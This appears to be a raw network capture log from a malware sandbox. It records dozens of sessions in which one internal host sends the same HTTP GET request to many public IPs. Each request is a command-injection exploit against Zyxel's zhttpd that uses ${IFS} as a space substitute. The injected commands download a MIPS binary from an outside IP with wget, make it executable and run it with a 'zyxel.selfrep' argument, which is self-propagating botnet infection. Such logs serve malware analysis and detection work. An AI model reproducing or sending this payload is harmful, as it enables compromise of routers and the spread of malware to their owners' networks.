                                      Jan 19, 2024 17:29:23.594129086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2195192.168.2.144951045.156.68.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.594171047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2196192.168.2.1459478179.199.19.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.594208956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2197192.168.2.145920063.68.227.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.594290018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2198192.168.2.1450794186.83.75.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.594295979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2199192.168.2.144574276.71.22.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.594372034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2200192.168.2.145329427.132.55.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.594372034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2201192.168.2.145349693.114.153.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.594386101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2202192.168.2.1458874105.179.129.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.594410896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2203192.168.2.1441766186.227.203.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.594501972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2204192.168.2.1458728105.37.110.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.594547987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2205192.168.2.1435490173.105.75.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.594579935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2206192.168.2.1433190135.75.239.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.594630003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2207192.168.2.1433230112.114.107.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.594687939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2208192.168.2.144502443.92.183.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.594722986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2209192.168.2.1456578186.110.89.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.594763041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2210192.168.2.144343666.200.13.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.594818115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2211192.168.2.1445144191.205.211.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.594841957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2212192.168.2.1447244220.112.55.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.594871998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2213192.168.2.1454804114.131.90.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.594933987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2214192.168.2.145941627.28.172.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.594974041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2215192.168.2.1452484159.162.135.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.595005035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2216192.168.2.144326835.24.108.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.595053911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2217192.168.2.1455640114.137.7.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.595082045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2218192.168.2.1433462150.157.19.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.595130920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2219192.168.2.1449228161.125.1.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.595180035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2220192.168.2.145668673.167.247.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.595216036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2221192.168.2.1444962171.98.176.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.595252991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2222192.168.2.1445280111.207.142.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.595299959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2223192.168.2.144545839.86.189.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.595355034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2224192.168.2.1448162151.82.171.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.595386028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2225192.168.2.1456790123.47.163.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.595436096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2226192.168.2.1445466206.233.119.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.595463991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2227192.168.2.1445046117.194.72.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.595504999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2228192.168.2.1444226165.18.95.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.595544100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2229192.168.2.1446192147.21.215.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.595577002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2230192.168.2.1446818134.67.121.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.595617056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2231192.168.2.144742883.162.188.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.595645905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2232192.168.2.1447642100.146.17.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.595676899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2233192.168.2.145586424.119.119.213443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.595730066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2234192.168.2.144916879.1.243.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.595757008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2235192.168.2.1451880140.126.145.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.595807076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2236192.168.2.145182024.103.165.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.595877886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2237192.168.2.1448326157.19.47.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.595901966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2238192.168.2.1437246175.95.67.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.595947027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2239192.168.2.144943649.16.130.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.595987082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2240192.168.2.1436992168.38.87.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.596048117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2241192.168.2.144005840.1.146.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.596065998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2242192.168.2.1453272159.194.10.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.596112967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2243192.168.2.146091242.115.235.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.596153021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2244192.168.2.1445844168.112.2.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.596224070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2245192.168.2.1455726179.46.104.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.596252918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2246192.168.2.1438542118.225.184.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.596292019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2247192.168.2.145243851.99.176.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.596323967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2248192.168.2.145428252.30.222.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.596369028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2249192.168.2.1457830201.133.7.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.596400023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2250192.168.2.1436080198.207.181.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.596443892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2251192.168.2.1444690153.154.17.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.596502066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2252192.168.2.1440050212.236.17.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.596535921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2253192.168.2.1450630179.247.125.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.596573114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2254192.168.2.1458140151.221.45.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.596616030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2255192.168.2.145211237.140.78.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.596673965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2256192.168.2.1441784187.224.173.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.596704960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2257192.168.2.1443974167.40.182.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.596760035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2258192.168.2.143906246.213.42.175443
                                      TimestampBytes transferredDirectionData
